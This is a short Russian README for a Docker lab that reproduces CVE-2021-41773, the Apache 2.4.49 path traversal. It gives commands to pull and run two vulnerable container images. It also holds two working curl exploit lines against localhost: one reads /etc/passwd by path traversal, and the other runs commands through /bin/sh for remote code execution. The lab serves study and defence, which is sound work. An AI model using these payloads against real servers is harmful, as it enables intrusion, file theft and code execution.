
Docker-лаборатория с уязвимостями для CVE-2021-41773 — обход пути в Apache, предоставляющая PoC-конфигурации для чтения файлов и удалённого выполнения кода в контролируемой среде.
Эта уязвимость применима только к версии 2.4.49 с определёнными нестандартными конфигурациями. В определённых ситуациях это может привести либо к чтению файлов, либо к выполнению кода.
https://twitter.com/ptswarm/status/1445376079548624899
Контейнеры можно загрузить напрямую из Docker Hub с помощью
docker pull blueteamsteve/cve-2021-41773:no-cgid
и запустить, используя
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Журналы Apache можно просмотреть с помощью команды ниже, либо просто уберите "-dit" из команды запуска выше, чтобы выводить stdout в потоковом режиме
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Контейнеры можно загрузить напрямую из Docker Hub с помощью
docker pull blueteamsteve/cve-2021-41773:with-cgid
и запустить, используя
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Журналы Apache можно просмотреть с помощью команды ниже, либо просто уберите "-dit" из команды запуска выше, чтобы выводить stdout в потоковом режиме
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Изменяйте и собирайте собственные версии, используя dockerfile и шаблоны файлов httpd.conf в подкаталогах